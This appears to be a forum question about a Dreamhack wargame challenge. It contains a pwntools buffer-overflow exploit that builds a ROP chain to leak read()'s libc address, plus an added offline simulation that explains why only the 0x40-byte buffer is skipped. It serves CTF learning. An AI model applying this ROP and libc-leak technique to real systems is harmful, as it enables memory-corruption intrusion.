0

read address

from pwn import *

context.log_level = 'debug'

#p = remote("host3.dreamhack.games", 21826)
p = process("./basic_rop_x64")
e = ELF("./basic_rop_x64")
libc = ELF("./libc.so.6")

read_plt = e.plt['read']
read_got = e.got['read']
puts_plt = e.plt['puts']
pop_rdi = 0x0000000000000a73  # pop rdi; ret gadget

print(f"read_plt: {hex(read_plt)}")
print(f"read_got: {hex(read_got)}")
print(f"puts_plt: {hex(puts_plt)}")

# buf (0x40) + sfp (0x8), then the chain: pop rdi; read@got; puts(read@got) -> leak
payload = b'A'*0x40 + b'B'*0x8
payload += p64(pop_rdi)
payload += p64(read_got)
payload += p64(puts_plt)

p.send(payload)
p.recvuntil(b"A"*0x40)  # skip the echoed 0x40-byte buffer
read = u64(p.recvn(6) + b"\x00"*2)  # 6 significant bytes of the leaked address, padded to 8

Question

Why do I have to skip only buf(0x40), and not buf(0x40) + sfp(0x8), to get the read function's address?

1 answer
-1

swno answered this on the Discord~ hehe
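As an added example (not code from the original post or from Dreamhack), the leak step of the script above simulated offline in plain Python. It assumes what the posted recvuntil relies on: the target writes back exactly sizeof(buf) = 0x40 bytes of the buffer (the write(1, buf, sizeof(buf)) pattern), so the 8 sfp bytes and the ROP chain never appear on stdout; the next thing the exploit reads is the output of puts(read@got). The p64/u64 helpers replace pwntools, and every address, the libc base and the read() offset are constructed values, not taken from the real binary or libc.

```python
import struct

# Stack layout from the posted payload: 0x40-byte buffer followed by the 8-byte saved rbp (sfp).
BUF_SIZE = 0x40
SFP_SIZE = 0x8

# Hypothetical addresses standing in for e.plt / e.got lookups (constructed for this demo).
POP_RDI = 0x0000000000000a73
READ_GOT = 0x601038
PUTS_PLT = 0x400580
MAIN = 0x400600

# Constructed libc: page-aligned base plus an assumed offset of read() (not the real libc.so.6).
FAKE_LIBC_BASE = 0x7F1234567000
FAKE_READ_OFFSET = 0x110070


def p64(v: int) -> bytes:
    return struct.pack("<Q", v)


def u64(b: bytes) -> int:
    return struct.unpack("<Q", b)[0]


def build_leak_chain() -> bytes:
    """Overflow buf and sfp, then: pop rdi; read@got; puts -> leak; return to main for stage 2."""
    payload = b"A" * BUF_SIZE + b"B" * SFP_SIZE
    payload += p64(POP_RDI) + p64(READ_GOT) + p64(PUTS_PLT) + p64(MAIN)
    return payload


def simulate_target(payload: bytes) -> bytes:
    """Constructed stand-in for the binary's stdout (assumption: write(1, buf, sizeof(buf))).
    Only the first 0x40 bytes of what we sent come back; the sfp and the chain do not.
    Then puts(read@got) prints the glibc address up to its first NUL byte, plus '\\n'."""
    echo = payload[:BUF_SIZE]
    raw = p64(FAKE_LIBC_BASE + FAKE_READ_OFFSET)
    leaked = raw[: raw.index(b"\x00")]  # puts() stops at the first NUL; user-space addrs give 6 bytes
    return echo + leaked + b"\n"


def parse_leak(stream: bytes, payload: bytes) -> int:
    """The posted approach: skip exactly the echoed buffer, take 6 bytes, pad to 8."""
    marker = payload[:BUF_SIZE]
    start = stream.index(marker) + len(marker)
    leaked = stream[start : start + 6]
    return u64(leaked.ljust(8, b"\x00"))


def find_echo_with_sfp(stream: bytes, payload: bytes) -> int:
    """The version the question asks about: waiting for 'A'*0x40 + 'B'*8 never matches,
    because the 'B's were never written back. Returns -1, i.e. recvuntil would hang."""
    return stream.find(payload[: BUF_SIZE + SFP_SIZE])


def libc_base(leak: int, read_offset: int) -> int:
    """libc base = leaked read() address - read() offset; must be page aligned."""
    base = leak - read_offset
    if base & 0xFFF:
        raise ValueError(f"base {base:#x} is not page aligned: wrong offset or misparsed leak")
    return base


if __name__ == "__main__":
    chain = build_leak_chain()
    out = simulate_target(chain)
    leak = parse_leak(out, chain)
    print(f"leaked read: {leak:#x}")
    print(f"libc base:   {libc_base(leak, FAKE_READ_OFFSET):#x}")
    print(f"echo incl. sfp found at: {find_echo_with_sfp(out, chain)}")
```

Two practical checks worth keeping in a real script: the page-alignment test on the computed base catches an off-by-one in the skip or a wrong libc offset immediately, and if the leaked address happens to contain a NUL in its low bytes, puts() stops early, so recvn(6) would also swallow the newline; reading up to the newline and padding whatever came back is the more robust form.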